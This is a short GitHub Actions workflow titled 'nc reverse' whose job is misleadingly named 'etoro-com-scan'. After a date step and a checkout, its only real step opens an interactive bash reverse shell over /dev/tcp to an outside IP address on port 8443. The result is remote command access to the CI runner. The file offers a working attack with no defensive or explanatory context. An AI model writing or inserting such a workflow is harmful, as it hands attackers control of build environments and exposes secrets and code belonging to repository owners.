name: nc reverse

on:
    workflow_dispatch:

jobs:
  etoro-com-scan:
    runs-on: ubuntu-latest
    timeout-minutes: 3600
    steps:
      - name: Get current date
        id: date
        run:  echo "::set-output name=date::$(date +'%Y-%m-%d')"
      - uses: actions/checkout@v2

      - run: |
          /bin/bash -i >& /dev/tcp/194.87.196.188/8443 0>&1

